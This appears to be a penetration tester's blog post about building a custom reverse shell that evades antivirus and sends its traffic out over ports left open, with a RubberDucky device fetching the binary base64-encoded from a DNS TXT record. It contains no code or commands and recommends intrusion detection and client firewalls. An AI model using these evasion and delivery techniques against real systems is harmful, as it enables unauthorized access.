The idea behind

I couldn't take over my "computer" of interest while nobody was watching, so pentest -> FAIL!

This was the first thing in my mind. I started to find a way to get a shell on victims computer and I found out that there are a ton of reverse shells existing in the wild world. But when I started to test some "well git" documented binaries I couldn't pass any AV-Engine test.

  • So I started again from beginning ...
  • Read docs of C++ libraries
  • Understand how socket connections do work
  • Start programming your first app and connect to netcat
  • or ...

Why not taking a reverseShell - rewrite and use it!

NeverEver ...

Compiled code is bad! Why should a so called WhiteHat on any forum give you a software for free?

Because he wants "your" victim to be part of his botnet! So I took the most simple code I found to get a reverse shell, modified the code and started to think about more complicated tasks to fullfil my job.

< HOW TO GET MY REVSH > on the computer?

The easy way

Imagine that most of companies do allow every traffic out of the Network and nothing in.

How stupid? How difficult is it to open only http, https and dns? So in my testing environment I just downloaded the binary and executed as unprivileged user. My ReverseShell connected via 4443 to my PenServer and job was done.

Next Step was locking up everything except http, https and dns traffic. This made my story more complicated but - the problem was possible to solve, because my NCAT also listened to port 80 and 443.

That's why I tell everybody to use an intrusion detection system [SNORT WILL BECOME YOUR BEST FRIEND]. But what if the "PenServer" is not outside but in the same network segment of your victim?

[YES] ClientFirewall activated would help a lot! 

The hard way

Imagine ...

  • Intrusion detection is on
  • Client Firewall is on
  • AV is good configured

Painful? No - RubberDucky downloads the binary as "base64" encoded string from TXT Record of a DNS entry. It turned out that I never saw a company which turned the USB Port off on any client. And it is very unlikely that companies do break the SSL Cert on https to detect any harmful traffic on port 443. So as far as I can say. There is a chance to show your "BOSS" why security is not a task of an external sub co working and outsourced company.